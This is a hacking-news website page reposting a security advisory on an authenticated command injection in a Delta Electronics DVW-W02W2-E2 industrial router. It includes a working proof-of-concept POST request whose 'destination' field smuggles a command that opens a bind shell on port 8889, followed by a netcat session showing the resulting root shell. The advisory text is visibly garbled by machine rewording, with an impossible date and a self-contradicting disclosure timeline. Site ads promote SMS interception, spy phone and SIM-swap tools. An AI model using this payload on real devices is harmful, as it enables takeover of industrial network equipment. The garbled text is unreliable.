• Advertise
  • SS7 Hacking
Saturday, February 4, 2023
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
SS7 SMS Intercept SS7 SMS Intercept SS7 SMS Intercept
Home Exploits

Delta Electronics E2 2.42 Command Injection

by Ineedhack
December 9, 2022
in Exploits
0
79
SHARES
493
VIEWS
Share on FacebookShare on Twitter
Kripkey Spy Phone Kripkey Spy Phone Kripkey Spy Phone

CyberDanube Security Research, 20221130-1
——————————————————————————-

Authenticated Command Injection

product| Delta Electronics DVW-W02W2-E2

vulnerable version| V2.42

V2.5.2

–

High

homepage| https://www.deltaww.com

found| 2022-08-01

by| T. Weber (Office Vienna)

CyberDanube Security Research

| Vienna | St. Polten

|

| https://www.cyberdanube.com

——————————————————————————-

Vendor description

——————————————————————————-

“Delta was founded in 1971 and is a worldwide provider of thermal energy and power.

Management

solutions. The company’s mission is “To Provide Innovative, Clean and Energy-Efficient Solutions.”

“Effective solutions for a Better Tomorrow” focuses on key issues.

Environmental issues like global climate change are important. Energy-saving

Solutions provider that has core competences in power electronics

automation,

Delta has three business segments: Power Electronics and Automation.

Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

Vulnerable versions

——————————————————————————-

DVW-W02W2-E2 / V2.42

Overview of vulnerability

——————————————————————————-

1) Inject Authenticated Command

An authenticated command injection is possible on the web server.

This allows attackers to have full access to the operating system

System of

The device must have all consequences. Such a device can be used as a key

Device in

An industrial network that controls critical equipment using serial communication.

ports,

An attempt to cause more damage to the network may result in greater destruction.

attacker.

The Proof of the Concept

——————————————————————————-

1) Injection of Authenticated Command

A POST authenticated command injection is possible on the web server

parameters. Only if “timestamp”, the parameter, is used.

Correctly

You can find the URL. This proof-of concept shows you how to make a port binding.

Shell on port 8889 to connect with an “utelnetd” listener

===============================================================================

POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1

Host: 192.168.3.148

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 105

Origin: http://192.168.3.148

Connectivity: Close

Referer: http://192.168.3.148/MT_ping.htm

Cookie: xxid=1973719449

Upgrade-Insecure-Requests: 1

submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d`

===============================================================================

The command “netcat”, which allows you to access the device’s information, can be used.

===============================================================================

$ nc 192.168.3.150 8889

!

BusyBox version 1.4.2 (2016-08-18 22.45:41 EDT). Built-in shell. (ash)

For a complete list of commands, enter ‘help’

/ #

===============================================================================

This vulnerability was verified manually on an emulated device using the

MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Lösung

——————————————————————————-

Upgrade to V2.5.2 firmware

You can work around it

——————————————————————————-

None

Recommendation

——————————————————————————-

CyberDanube suggests that Delta Electronics customers upgrade their computers

Firmware

The latest version is available.

Get in touch with us

——————————————————————————-

2022-08-02: Contacting Delta Electronics.

2022-08-10

Consult with

Delta Electronics.

2022-08-16 : Security Contact asked few questions about responsible

Disclosure; Sent responses

2022-08-30: We are requesting an update.

2022/09/01: Vendor replied that they would need to take more time in order to solve the issue.

Issues; Additional 30 Days (until 0222-11-02)

patching.

2022-10-11

2022-10-12: Vendor replied that the fixing would be performed 2022-11-15; Shifted

Release date at this time

2022-10-16 – Vendor has moved the release date to 2022-11-18 Shifted

advisory

Release date: The same day.

2022-10-17

2022-10-18 – Asked for an upgrade and moved the release date to 2022-10-22

2022-10-19: Vendor replied that the release of the document was not possible.

patch.

Contact informed us that the patch would delay to end of

November.

2022-10-21: I asked the vendor for a specific release date.

2022-10-28 : Vendor has been advised of an advisory release date for 2022-10-30.

2022-10-30: Found firmware patches with the issue date of 2022-11-25 at vendors

website.

2022-10-30 Coordination of release

advisory.

Web: https://www.cyberdanube.com

Twitter: https://twitter.com/cyberdanube

Email: cyberdanube at com

EOF T. Weber / @2022

Tags: hack newshacking softwarehacking tipshacking toolshacking tutorialsinstagram hackjpg exploitsms exploit
Ineedhack

Ineedhack

Next Post

Planet eStream Code Execution / SQL Injection / XSS / Broken Control

Sim Swap Software Sim Swap Software Sim Swap Software

Recommended

Microsoft Outlook 2019 16.0.13231.20262 Remote code execution

3 months ago

Jettweb Ready Rent A car Script 4 Cross Site

2 weeks ago

Popular News

    • Advertise
    • SS7 Hacking

    ©2017- 2022 Hacking Tutorials

    No Result
    View All Result
    • Home
    • Exploits
    • Hacking News
    • Hacking Tools
    • Hacking Tutorials
    • Kali Linux
    • Security
    • Advertise